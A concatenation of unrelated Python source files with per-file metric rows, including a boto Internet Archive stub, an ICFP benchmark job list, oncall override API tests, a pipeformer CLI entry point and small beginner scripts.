is_secure=False, **kwargs):
"""
Connect to the Internet Archive via their S3-like API.
:type ia_access_key_id: string
:param ia_access_key_id: Your IA Access Key ID. This will also look in your
boto config file for an entry in the Credentials
section called "ia_access_key_id"
:type ia_secret_access_key: string
:param ia_secret_access_key: Your IA Secret Access Key. This will also
look in your boto config file for an entry
in the Credentials section called
"ia_secret_access_key"
:rtype: :class:`boto.s3.connection.S3Connection`
:return: A connection to the Internet Archive
"""
raise BotoClientError('Not Implemented')
# vim:set ft=python sw=4 :
| 34.936599 | 85 | 0.727625 | 1,747 | 12,123 | 4.797367 | 0.131082 | 0.195442 | 0.119437 | 0.136976 | 0.717695 | 0.70624 | 0.607684 | 0.565684 | 0.565684 | 0.565684 | 0 | 0.005811 | 0.190877 | 12,123 | 346 | 86 | 35.037572 | 0.848608 | 0.633919 | 0 | 0.372881 | 0 | 0 | 0.093463 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.372881 | false | 0 | 0.169492 | 0 | 0.576271 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
7afbeeb0d62fce8e7b807f6f100acf5f55db87a0 | 9,230 | py | Python | recommend/eusolver/scripts/job_list_icfp_anytime.py | jiry17/IntSy | 36333489b77ff2fbe84e6440be1f6b84eb61f29e | [
"MIT"
] | 7 | 2020-03-01T12:07:44.000Z | 2021-10-20T02:34:59.000Z | recommend/esolver/scripts/job_list_icfp_anytime.py | jiry17/PolyGen | b384e478ec91299d6a14f4681ff3e0850911822b | [
"MIT"
] | 1 | 2020-05-25T22:08:35.000Z | 2020-05-25T22:08:35.000Z | recommend/eusolver/scripts/job_list_icfp_anytime.py | jiry17/IntSy | 36333489b77ff2fbe84e6440be1f6b84eb61f29e | [
"MIT"
] | 1 | 2021-12-01T08:18:21.000Z | 2021-12-01T08:18:21.000Z | # job_list_one_shot.py ---
#
# Filename: job_list_one_shot.py
# Author: Abhishek Udupa
# Created: Tue Jan 26 15:13:19 2016 (-0500)
#
#
# Copyright (c) 2015, Abhishek Udupa, University of Pennsylvania
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. All advertising materials mentioning features or use of this software
# must display the following acknowledgement:
# This product includes software developed by The University of Pennsylvania
# 4. Neither the name of the University of Pennsylvania nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#
# Code:
[
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_103_10.sl'], 'icfp_103_10-anytime', 'icfp_103_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_113_1000.sl'], 'icfp_113_1000-anytime', 'icfp_113_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_125_10.sl'], 'icfp_125_10-anytime', 'icfp_125_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_14_1000.sl'], 'icfp_14_1000-anytime', 'icfp_14_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_147_1000.sl'], 'icfp_147_1000-anytime', 'icfp_147_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_28_10.sl'], 'icfp_28_10-anytime', 'icfp_28_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_39_100.sl'], 'icfp_39_100-anytime', 'icfp_39_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_51_10.sl'], 'icfp_51_10-anytime', 'icfp_51_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_68_1000.sl'], 'icfp_68_1000-anytime', 'icfp_68_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_72_10.sl'], 'icfp_72_10-anytime', 'icfp_72_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_82_10.sl'], 'icfp_82_10-anytime', 'icfp_82_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_94_1000.sl'], 'icfp_94_1000-anytime', 'icfp_94_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_96_10.sl'], 'icfp_96_10-anytime', 'icfp_96_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_104_10.sl'], 'icfp_104_10-anytime', 'icfp_104_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_114_100.sl'], 'icfp_114_100-anytime', 'icfp_114_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_134_1000.sl'], 'icfp_134_1000-anytime', 'icfp_134_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_143_1000.sl'], 'icfp_143_1000-anytime', 'icfp_143_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_150_10.sl'], 'icfp_150_10-anytime', 'icfp_150_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_30_10.sl'], 'icfp_30_10-anytime', 'icfp_30_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_45_1000.sl'], 'icfp_45_1000-anytime', 'icfp_45_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_54_1000.sl'], 'icfp_54_1000-anytime', 'icfp_54_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_69_10.sl'], 'icfp_69_10-anytime', 'icfp_69_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_73_10.sl'], 'icfp_73_10-anytime', 'icfp_73_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_87_10.sl'], 'icfp_87_10-anytime', 'icfp_87_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_94_100.sl'], 'icfp_94_100-anytime', 'icfp_94_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_99_100.sl'], 'icfp_99_100-anytime', 'icfp_99_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_105_1000.sl'], 'icfp_105_1000-anytime', 'icfp_105_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_118_100.sl'], 'icfp_118_100-anytime', 'icfp_118_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_135_100.sl'], 'icfp_135_100-anytime', 'icfp_135_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_144_1000.sl'], 'icfp_144_1000-anytime', 'icfp_144_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_21_1000.sl'], 'icfp_21_1000-anytime', 'icfp_21_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_32_10.sl'], 'icfp_32_10-anytime', 'icfp_32_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_45_10.sl'], 'icfp_45_10-anytime', 'icfp_45_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_56_1000.sl'], 'icfp_56_1000-anytime', 'icfp_56_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_7_1000.sl'], 'icfp_7_1000-anytime', 'icfp_7_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_81_1000.sl'], 'icfp_81_1000-anytime', 'icfp_81_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_9_1000.sl'], 'icfp_9_1000-anytime', 'icfp_9_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_95_100.sl'], 'icfp_95_100-anytime', 'icfp_95_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_105_100.sl'], 'icfp_105_100-anytime', 'icfp_105_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_118_10.sl'], 'icfp_118_10-anytime', 'icfp_118_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_139_10.sl'], 'icfp_139_10-anytime', 'icfp_139_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_144_100.sl'], 'icfp_144_100-anytime', 'icfp_144_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_25_1000.sl'], 'icfp_25_1000-anytime', 'icfp_25_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_38_10.sl'], 'icfp_38_10-anytime', 'icfp_38_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_5_1000.sl'], 'icfp_5_1000-anytime', 'icfp_5_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_64_10.sl'], 'icfp_64_10-anytime', 'icfp_64_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_7_10.sl'], 'icfp_7_10-anytime', 'icfp_7_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_82_100.sl'], 'icfp_82_100-anytime', 'icfp_82_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_93_1000.sl'], 'icfp_93_1000-anytime', 'icfp_93_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_96_1000.sl'], 'icfp_96_1000-anytime', 'icfp_96_1000-anytime')
]
#
# job_list_one_shot.py ends here
| 97.157895 | 150 | 0.676598 | 1,282 | 9,230 | 4.630265 | 0.159906 | 0.117925 | 0.134771 | 0.193733 | 0.540263 | 0.52409 | 0.52409 | 0.52409 | 0.52409 | 0.515836 | 0 | 0.128119 | 0.101083 | 9,230 | 94 | 151 | 98.191489 | 0.587321 | 0.201083 | 0 | 0 | 0 | 0 | 0.721162 | 0.261113 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
bb056645286e578beacdd13141aef618891149b4 | 6,640 | py | Python | e2e/test_override.py | navoday-91/oncall | 0a977f06bbf308978d0d2c2b46e0aca23937ca9a | [
"BSD-2-Clause"
] | 857 | 2017-05-03T00:59:10.000Z | 2022-03-29T06:45:23.000Z | e2e/test_override.py | navoday-91/oncall | 0a977f06bbf308978d0d2c2b46e0aca23937ca9a | [
"BSD-2-Clause"
] | 142 | 2017-05-03T02:00:58.000Z | 2022-03-25T20:58:11.000Z | e2e/test_override.py | navoday-91/oncall | 0a977f06bbf308978d0d2c2b46e0aca23937ca9a | [
"BSD-2-Clause"
] | 218 | 2017-05-03T02:04:56.000Z | 2022-03-25T18:28:04.000Z | # Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
import requests
import time
from testutils import prefix,api_v0
start, end = int(time.time()), int(time.time() + 36000)
start = start / 1000 * 1000
end = end / 1000 * 1000
# Helper function to send an override request
def override(start_time, end_time, ev_ids, user):
re = requests.post(api_v0('events/override'),
json={'start': start_time,
'end': end_time,
'event_ids': ev_ids,
'user': user})
assert re.status_code == 200
return re
# Test override when events need to be split
@prefix('test_v0_override_split')
def test_api_v0_override_split(team, user, role, event):
team_name = team.create()
user_name = user.create()
override_user = user.create()
role_name = role.create()
user.add_to_team(user_name, team_name)
user.add_to_team(override_user, team_name)
ev_id = event.create({'start': start,
'end': end,
'user': user_name,
'team': team_name,
'role': role_name})
re = override(start + 100, end - 100, [ev_id], override_user)
data = re.json()
assert len(data) == 3
re = requests.get(api_v0('events?user=' + user_name))
events = sorted(re.json(), key=lambda x: x['start'])
assert len(events) == 2
assert events[0]['end'] == start + 100
assert events[1]['start'] == end - 100
re = requests.get(api_v0('events?user=' + override_user))
events = re.json()
assert events[0]['start'] == start + 100
assert events[0]['end'] == end - 100
# Test override when an event's start needs to be edited
@prefix('test_v0_override_edit_start')
def test_api_v0_override_edit_start(team, user, role, event):
team_name = team.create()
user_name = user.create()
override_user = user.create()
role_name = role.create()
user.add_to_team(user_name, team_name)
user.add_to_team(override_user, team_name)
ev_id = event.create({'start': start,
'end': end,
'user': user_name,
'team': team_name,
'role': role_name})
re = override(start, end - 100, [ev_id], override_user)
data = re.json()
assert len(data) == 2
re = requests.get(api_v0('events?user=' + user_name))
events = re.json()
assert len(events) == 1
assert events[0]['end'] == end
assert events[0]['start'] == end - 100
re = requests.get(api_v0('events?user=' + override_user))
events = re.json()
assert events[0]['start'] == start
assert events[0]['end'] == end - 100
# Test override when an event's end needs to be edited
@prefix('test_api_v0_override_edit_end')
def test_api_v0_override_edit_end(team, user, role, event):
team_name = team.create()
user_name = user.create()
override_user = user.create()
role_name = role.create()
user.add_to_team(user_name, team_name)
user.add_to_team(override_user, team_name)
ev_id = event.create({'start': start,
'end': end,
'user': user_name,
'team': team_name,
'role': role_name})
re = override(start + 100, end, [ev_id], override_user)
data = re.json()
assert len(data) == 2
re = requests.get(api_v0('events?user=' + user_name))
events = re.json()
assert len(events) == 1
assert events[0]['end'] == start + 100
assert events[0]['start'] == start
re = requests.get(api_v0('events?user=' + override_user))
events = re.json()
assert events[0]['start'] == start + 100
assert events[0]['end'] == end
# Test override when an event needs to be deleted
@prefix('test_api_v0_override_delete')
def test_api_v0_override_delete(team, user, role, event):
team_name = team.create()
user_name = user.create()
override_user = user.create()
role_name = role.create()
user.add_to_team(user_name, team_name)
user.add_to_team(override_user, team_name)
ev_id = event.create({'start': start,
'end': end,
'user': user_name,
'team': team_name,
'role': role_name})
re = override(start - 10, end + 10, [ev_id], override_user)
assert len(re.json()) == 1
re = requests.get(api_v0('events?user=' + user_name))
events = re.json()
assert len(events) == 0
re = requests.get(api_v0('events?user=' + override_user))
events = re.json()
assert events[0]['start'] == start
assert events[0]['end'] == end
# Test combination of above cases
@prefix('test_api_v0_override_multiple')
def test_api_v0_override_multiple(team, user, role, event):
team_name = team.create()
role_name = role.create()
user_name = user.create()
override_user = user.create()
user.add_to_team(user_name, team_name)
user.add_to_team(override_user, team_name)
ev1 = event.create({'start': start-1000,
'end': start+1000,
'user': user_name,
'team': team_name,
'role': role_name})
ev2 = event.create({'start': start+1000,
'end': start+2000,
'user': user_name,
'team': team_name,
'role': role_name})
ev3 = event.create({'start': start+2000,
'end': end-1000,
'user': user_name,
'team': team_name,
'role': role_name})
ev4 = event.create({'start': end-1000,
'end': end+1000,
'user': user_name,
'team': team_name,
'role': role_name})
re = override(start, end, [ev1, ev2, ev3, ev4], override_user)
assert len(re.json()) == 3
re = requests.get(api_v0('events?user=' + user_name))
events = sorted(re.json(), key=lambda x: x['start'])
assert len(events) == 2
assert events[0]['start'] == start - 1000
assert events[0]['end'] == start
assert events[1]['start'] == end
assert events[1]['end'] == end + 1000
re = requests.get(api_v0('events?user=' + override_user))
events = re.json()
assert events[0]['start'] == start
assert events[0]['end'] == end
| 34.051282 | 99 | 0.569428 | 860 | 6,640 | 4.2 | 0.10814 | 0.050941 | 0.061185 | 0.035991 | 0.807309 | 0.746401 | 0.692414 | 0.674142 | 0.652547 | 0.631506 | 0 | 0.035226 | 0.294578 | 6,640 | 194 | 100 | 34.226804 | 0.735909 | 0.064608 | 0 | 0.690789 | 0 | 0 | 0.087069 | 0.021606 | 0 | 0 | 0 | 0 | 0.203947 | 1 | 0.039474 | false | 0 | 0.019737 | 0 | 0.065789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
bb08c7db08a3a4f46b4d54e98699f5915dfaad1f | 123 | py | Python | Chapter04/deque_tail.py | PacktPublishing/Secret-Recipes-of-the-Python-Ninja | 805d00c7a54927ba94c9077e9a580508ee3c5e56 | [
"MIT"
] | 13 | 2018-06-21T01:44:49.000Z | 2021-12-01T10:49:53.000Z | Chapter04/deque_tail.py | PacktPublishing/Secret-Recipes-of-the-Python-Ninja | 805d00c7a54927ba94c9077e9a580508ee3c5e56 | [
"MIT"
] | null | null | null | Chapter04/deque_tail.py | PacktPublishing/Secret-Recipes-of-the-Python-Ninja | 805d00c7a54927ba94c9077e9a580508ee3c5e56 | [
"MIT"
] | 6 | 2018-10-05T08:29:24.000Z | 2022-01-11T14:49:50.000Z | def tail(filename, n=10):
'Return the last n lines of a file'
with open(filename) as f:
return deque(f, n)
| 24.6 | 39 | 0.617886 | 22 | 123 | 3.454545 | 0.772727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022472 | 0.276423 | 123 | 4 | 40 | 30.75 | 0.831461 | 0.268293 | 0 | 0 | 0 | 0 | 0.268293 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
bb54dd743272c66fa05ae9d165ff7620f4013ada | 381 | py | Python | ood_samplefree/datasets/utils.py | jm-begon/ood_samplefree | 2c659fa8f2d15487f78c811c3fdeded1b1cfe91c | [
"BSD-3-Clause"
] | 2 | 2021-09-14T12:54:30.000Z | 2021-10-24T02:23:39.000Z | ood_samplefree/datasets/utils.py | jm-begon/ood_samplefree | 2c659fa8f2d15487f78c811c3fdeded1b1cfe91c | [
"BSD-3-Clause"
] | null | null | null | ood_samplefree/datasets/utils.py | jm-begon/ood_samplefree | 2c659fa8f2d15487f78c811c3fdeded1b1cfe91c | [
"BSD-3-Clause"
] | null | null | null | from torch.utils.data import DataLoader, ConcatDataset, Subset
def get_transform(dataset):
if isinstance(dataset, DataLoader):
return get_transform(dataset.dataset)
if isinstance(dataset, ConcatDataset):
return get_transform(dataset.datasets[0])
if isinstance(dataset, Subset):
return get_transform(dataset.dataset)
return dataset.transform | 38.1 | 62 | 0.748031 | 43 | 381 | 6.534884 | 0.395349 | 0.170819 | 0.270463 | 0.266904 | 0.227758 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003165 | 0.170604 | 381 | 10 | 63 | 38.1 | 0.886076 | 0 | 0 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
2474676875cc2c935504da7b72bf8c3ba2c468ac | 542 | py | Python | crawl.py | audrummer15/motif-crawler | 4f3f05ef7304c258c41e5f4e61e13e834a6eb56c | [
"MIT"
] | null | null | null | crawl.py | audrummer15/motif-crawler | 4f3f05ef7304c258c41e5f4e61e13e834a6eb56c | [
"MIT"
] | null | null | null | crawl.py | audrummer15/motif-crawler | 4f3f05ef7304c258c41e5f4e61e13e834a6eb56c | [
"MIT"
] | null | null | null | import os
import subprocess
import pycurl
from bs4 import BeautifulSoup
from bs4 import SoupStrainer
from lib.MotifAuthorizationManager import MotifAuthorizationManager
from lib.RequestHandler import RequestHandler
from lib.SettingsManager import SettingsManager
COOKIEJAR = os.path.join("build", "cookies.txt")
sm = SettingsManager()
mam = MotifAuthorizationManager(sm.getEmail(), sm.getPassword(), sm.getPhone(), COOKIEJAR)
if not mam.isUserAuthorized():
mam.authorizeUser()
else:
print "User Authorized"
rh = RequestHandler()
| 24.636364 | 90 | 0.800738 | 59 | 542 | 7.355932 | 0.542373 | 0.048387 | 0.059908 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004175 | 0.116236 | 542 | 21 | 91 | 25.809524 | 0.901879 | 0 | 0 | 0 | 0 | 0 | 0.057196 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.0625 | 0.5 | null | null | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 3 |
24779120f2fb70a303e87b2558dd2ff75366f03a | 152 | py | Python | tr_sys/tr_ars/__init__.py | jdr0887/Relay | 323b954033dc7fc6bd9acc52cfec7133594ee59a | [
"MIT"
] | 4 | 2020-02-06T17:15:46.000Z | 2021-08-30T14:16:40.000Z | tr_sys/tr_ars/__init__.py | jdr0887/Relay | 323b954033dc7fc6bd9acc52cfec7133594ee59a | [
"MIT"
] | 109 | 2020-04-27T21:07:13.000Z | 2022-02-18T18:34:53.000Z | tr_sys/tr_ars/__init__.py | jdr0887/Relay | 323b954033dc7fc6bd9acc52cfec7133594ee59a | [
"MIT"
] | 23 | 2020-01-14T17:02:20.000Z | 2022-02-11T16:20:00.000Z | import logging
logger = logging.getLogger(__name__)
logger.debug('Initializing module %s...' % __name__)
import pymysql
pymysql.install_as_MySQLdb()
| 16.888889 | 52 | 0.782895 | 18 | 152 | 6.055556 | 0.722222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 152 | 8 | 53 | 19 | 0.801471 | 0 | 0 | 0 | 0 | 0 | 0.164474 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
2477e99d42671a5856b6477a89453acfc665aa72 | 1,453 | py | Python | src/pipeformer/__init__.py | awslabs/pipeformer | bf7f4f15b4c3698cd7c361a9d376a46980dd2a00 | [
"Apache-2.0"
] | 10 | 2019-03-31T13:46:07.000Z | 2020-08-26T22:40:58.000Z | src/pipeformer/__init__.py | amazon-archives/pipeformer | bf7f4f15b4c3698cd7c361a9d376a46980dd2a00 | [
"Apache-2.0"
] | 39 | 2019-03-13T09:08:25.000Z | 2020-12-14T23:08:09.000Z | src/pipeformer/__init__.py | awslabs/pipeformer | bf7f4f15b4c3698cd7c361a9d376a46980dd2a00 | [
"Apache-2.0"
] | 8 | 2019-03-11T22:25:11.000Z | 2020-05-27T20:45:15.000Z | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""pipeformer."""
import uuid
from typing import Iterator, Optional
from .deploy import Deployer
from .identifiers import __version__
from .internal.arg_parsing import parse_args
from .internal.logging_utils import setup_logger
from .internal.structures import Config
__all__ = ("__version__", "cli")
def cli(raw_args: Optional[Iterator[str]] = None):
"""CLI entry point. Processes arguments, sets up the key provider, and processes requested action.
:returns: Execution return value intended for ``sys.exit()``
"""
args = parse_args(raw_args)
setup_logger(args.verbosity, args.quiet)
# 1. parse config file
project = Config.from_file(args.config)
# TODO: Use a better prefix
prefix = "pipeformer-" + str(uuid.uuid4()).split("-")[-1]
project_deployer = Deployer(project=project, stack_prefix=prefix)
project_deployer.deploy_standalone()
| 33.022727 | 103 | 0.741225 | 202 | 1,453 | 5.207921 | 0.564356 | 0.057034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009046 | 0.163111 | 1,453 | 43 | 104 | 33.790698 | 0.856086 | 0.519615 | 0 | 0 | 0 | 0 | 0.039098 | 0 | 0 | 0 | 0 | 0.023256 | 0 | 1 | 0.066667 | false | 0 | 0.466667 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
2482074f10e8565981ef5f29b1f4fe169b0567b5 | 238 | py | Python | Academic/Simple/ex_13.py | LookThisCode/Python-Basic-001 | ad9749e14864c2114d454d5984de62542eb7152a | [
"Apache-2.0"
] | null | null | null | Academic/Simple/ex_13.py | LookThisCode/Python-Basic-001 | ad9749e14864c2114d454d5984de62542eb7152a | [
"Apache-2.0"
] | null | null | null | Academic/Simple/ex_13.py | LookThisCode/Python-Basic-001 | ad9749e14864c2114d454d5984de62542eb7152a | [
"Apache-2.0"
] | null | null | null | __author__ = 'nickbortolotti'
from sys import argv
script, firts, second, third = argv
print "El scrip lleva por nombre", script
print "La variable uno lleva por nombre", firts
print "La variable 2", second
print "la variable 3", third | 23.8 | 47 | 0.752101 | 36 | 238 | 4.861111 | 0.583333 | 0.12 | 0.257143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010101 | 0.168067 | 238 | 10 | 48 | 23.8 | 0.873737 | 0 | 0 | 0 | 0 | 0 | 0.405858 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.142857 | null | null | 0.571429 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
24bc2e95dadb1642bf9d26937c852e1ec7730615 | 160 | py | Python | chaptertwo/namecases.py | cmotek/python_crashcourse | 29cbdd6699cd17192bb599d235852d547630d110 | [
"Apache-2.0"
] | null | null | null | chaptertwo/namecases.py | cmotek/python_crashcourse | 29cbdd6699cd17192bb599d235852d547630d110 | [
